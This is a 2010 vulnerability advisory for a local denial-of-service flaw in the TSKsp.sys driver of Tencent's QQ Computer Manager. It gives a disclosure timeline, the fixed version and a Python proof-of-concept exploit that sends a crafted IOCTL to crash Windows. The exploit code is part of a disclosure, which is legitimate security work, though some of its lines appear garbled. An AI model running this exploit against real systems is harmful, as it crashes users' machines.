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QQ Computer Manager TSKsp.sys Driver Local Denial of Service Vulnerability

QQ Computer Manager TSKsp.sys Driver Local Denial of Service Vulnerability

By Lufeng Li of Neusoft Corporation

Vulnerable: QQpcmgr<=v4.0Beta1

Vendor: Tencent Inc

1) Software Description:
QQ doctors more than three years after the development and operation, and 
finally ushered in the fourth generation - QQ Computer Manager 4.0 . QQ butler 
4.0 version  of 

the computer not only doctors and QQ QQ integrated software management, and 
increased cloud killing horses, clean up the core function of plug-ins; 
addition,QQ computer 

butler innovative features introduced software to move, you can easily solve 
the insufficient disk space C problem.

2) Details:
A  local denial of service vulnerability in QQ Computer Manager that handling 
ioctl request. A successful attack can lead to BSoD. 

3) Timeline:
2010.07.01  Vendor notified 
2010.07.22  Vendor released new fixed versions
2010.08.09  Advisory released

4) Solution:
Update to version QQPCMgr_40_278.

5) Exploit:

# Title: QQ Computer Manager TSKsp.sys Local Denial of Service Exploit
# Author: Lufeng Li of Neusoft Corporation
# Vendor: http://pcmgr.qq.com
# Platform: Windows XPSP3 Chinese Simplified
# Tested: QQpcmgr v4.0Beta1
# Vulnerable: QQpcmgr<=v4.0Beta1
from ctypes import *

kernel32 = windll.kernel32
Psapi    = windll.Psapi

if __name__ == '__main__':
    GENERIC_READ  = 0x80000000
    GENERIC_WRITE = 0x40000000

    DEVICE_NAME   = "\\\\.\\tsksp"
    dwReturn      = c_ulong()
    out_data      = ''
    in_data       = ''
    driver_handle1 = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | 
                                                0, None, CREATE_ALWAYS, 0, None)
    dev_ioctl = kernel32.DeviceIoControl(driver_handle1, 0x22e01c, in_data,0, 
out_data, 0,byref(dwReturn), None)

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